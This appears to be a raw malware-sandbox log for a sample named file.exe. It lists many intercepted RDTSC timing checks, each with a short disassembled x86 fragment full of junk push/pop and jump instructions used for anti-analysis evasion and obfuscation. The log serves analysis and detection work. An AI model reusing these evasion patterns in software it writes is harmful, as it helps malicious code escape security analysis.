Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A2DF3 second address: 10A2E1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A2E1D second address: 10A2E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FC85D338E4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FC85D338E26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A2E56 second address: 10A2E5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A30EC second address: 10A30F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A30F1 second address: 10A30F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AD952 second address: 10AD95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AD95A second address: 10AD97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC85CDF02B8h 0x0000000c jo 00007FC85CDF02A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AF4FA second address: 10AF4FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AF4FE second address: 10AF51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC85CDF02B8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDAECF second address: FDAEDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC85D338E26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B745C second address: 10B7461 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B7461 second address: 10B746D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC85D338E26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B746D second address: 10B7482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FC85CDF02A8h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B7482 second address: 10B7486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B7486 second address: 10B748C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B748C second address: 10B7491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B7491 second address: 10B7499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B7499 second address: 10B74A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C30D3 second address: 10C30D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C30D9 second address: 10C30DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10CC124 second address: 10CC12A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10CC12A second address: 10CC13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jno 00007FC85D338E52h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10CC13A second address: 10CC140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10CADD9 second address: 10CADF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FC85D338E34h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10CADF8 second address: 10CAE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC85CDF02B1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jc 00007FC85CDF02B4h 0x00000013 jmp 00007FC85CDF02AEh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC85CDF02AFh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10CF5B0 second address: 10CF5CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC85D338E36h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11077C6 second address: 11077D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11077D1 second address: 11077EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC85D338E35h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11077EA second address: 11077EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11099A3 second address: 11099A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11099A9 second address: 11099ED instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC85CDF02A6h 0x00000008 jnp 00007FC85CDF02A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FC85CDF02B9h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC85CDF02B0h 0x0000001f jc 00007FC85CDF02A6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11099ED second address: 11099FB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC85D338E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11099FB second address: 1109A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC85CDF02A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1109A05 second address: 1109A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1109A09 second address: 1109A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC85CDF02B4h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111B096 second address: 111B0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111B0A0 second address: 111B0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E0DC3 second address: 11E0DC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E0DC7 second address: 11E0DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E0DCD second address: 11E0DE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E34h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E0DE7 second address: 11E0DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E14E1 second address: 11E150C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jnl 00007FC85D338E26h 0x0000000e jne 00007FC85D338E26h 0x00000014 jnc 00007FC85D338E26h 0x0000001a popad 0x0000001b jmp 00007FC85D338E2Dh 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E150C second address: 11E1512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1840 second address: 11E187A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC85D338E35h 0x0000000c jmp 00007FC85D338E2Fh 0x00000011 popad 0x00000012 jl 00007FC85D338E32h 0x00000018 jo 00007FC85D338E2Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E19DA second address: 11E19DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E19DE second address: 11E19EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC85D338E26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E19EA second address: 11E19F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC85CDF02A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E19F4 second address: 11E19F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E19F8 second address: 11E19FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E19FE second address: 11E1A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1A08 second address: 11E1A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E475A second address: 11E4770 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC85D338E2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E4770 second address: 11E4775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E49AB second address: 11E49B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E49B1 second address: 11E49B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E4D22 second address: 11E4DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FC85D338E35h 0x0000000a jns 00007FC85D338E26h 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FC85D338E28h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f push dword ptr [ebp+12456B32h] 0x00000035 ja 00007FC85D338E33h 0x0000003b call 00007FC85D338E29h 0x00000040 jmp 00007FC85D338E39h 0x00000045 push eax 0x00000046 js 00007FC85D338E34h 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E4DAA second address: 11E4DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E4DAE second address: 11E4DBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E4DBC second address: 11E4DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop esi 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC85CDF02B4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E4DDC second address: 11E4DF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC85D338E26h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E4DF4 second address: 11E4DFA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E7B67 second address: 11E7B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E7B6D second address: 11E7B77 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC85CDF02A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E7B77 second address: 11E7B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E7B82 second address: 11E7B9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jp 00007FC85CDF02A6h 0x0000000c jmp 00007FC85CDF02ABh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0094 second address: 73C009A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C009A second address: 73C00CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 movzx esi, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d call 00007FC85CDF02ABh 0x00000012 mov dl, ah 0x00000014 pop edx 0x00000015 popad 0x00000016 mov ebx, dword ptr [eax+10h] 0x00000019 jmp 00007FC85CDF02B0h 0x0000001e xchg eax, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C00CF second address: 73C00D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C00D6 second address: 73C00F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C00F7 second address: 73C00FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C00FD second address: 73C0146 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FC85CDF02B6h 0x0000000f mov esi, dword ptr [762C06ECh] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC85CDF02B7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0146 second address: 73C016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C016B second address: 73C016F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C016F second address: 73C0175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0175 second address: 73C0199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FC85CDF119Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dl, BAh 0x00000014 mov cl, 07h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0199 second address: 73C01B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC85D338E37h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C01B4 second address: 73C01DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 30676FBEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C01DE second address: 73C01E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C01E3 second address: 73C0272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC85CDF02B0h 0x00000009 jmp 00007FC85CDF02B5h 0x0000000e popfd 0x0000000f mov dl, cl 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 jmp 00007FC85CDF02AAh 0x0000001a xchg eax, edi 0x0000001b jmp 00007FC85CDF02B0h 0x00000020 call dword ptr [76290B60h] 0x00000026 mov eax, 75A0E5E0h 0x0000002b ret 0x0000002c jmp 00007FC85CDF02B0h 0x00000031 push 00000044h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push ebx 0x00000037 pop ecx 0x00000038 pushfd 0x00000039 jmp 00007FC85CDF02B9h 0x0000003e jmp 00007FC85CDF02ABh 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0272 second address: 73C02DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 345E974Ah 0x00000008 mov bh, DEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop edi 0x0000000e pushad 0x0000000f pushad 0x00000010 movzx eax, bx 0x00000013 movsx edx, ax 0x00000016 popad 0x00000017 mov di, ax 0x0000001a popad 0x0000001b xchg eax, edi 0x0000001c pushad 0x0000001d mov edx, ecx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FC85D338E2Eh 0x00000026 jmp 00007FC85D338E35h 0x0000002b popfd 0x0000002c mov ecx, 5BEA0F57h 0x00000031 popad 0x00000032 popad 0x00000033 push eax 0x00000034 jmp 00007FC85D338E2Dh 0x00000039 xchg eax, edi 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FC85D338E2Dh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C02DC second address: 73C02EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC85CDF02ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C03CB second address: 73C03CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C03CF second address: 73C03D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C03D5 second address: 73C041C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC8CC1B80E1h 0x0000000f jmp 00007FC85D338E30h 0x00000014 sub eax, eax 0x00000016 jmp 00007FC85D338E31h 0x0000001b mov dword ptr [esi], edi 0x0000001d pushad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C041C second address: 73C0422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0422 second address: 73C0498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FC85D338E36h 0x0000000b and ax, 8458h 0x00000010 jmp 00007FC85D338E2Bh 0x00000015 popfd 0x00000016 popad 0x00000017 mov dword ptr [esi+04h], eax 0x0000001a jmp 00007FC85D338E36h 0x0000001f mov dword ptr [esi+08h], eax 0x00000022 jmp 00007FC85D338E30h 0x00000027 mov dword ptr [esi+0Ch], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC85D338E37h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0498 second address: 73C049D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C049D second address: 73C04C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FC85D338E35h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+4Ch] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ch, 5Ah 0x00000015 mov bx, 6AA8h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C04C7 second address: 73C04CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C04CD second address: 73C04D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C04D1 second address: 73C04D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
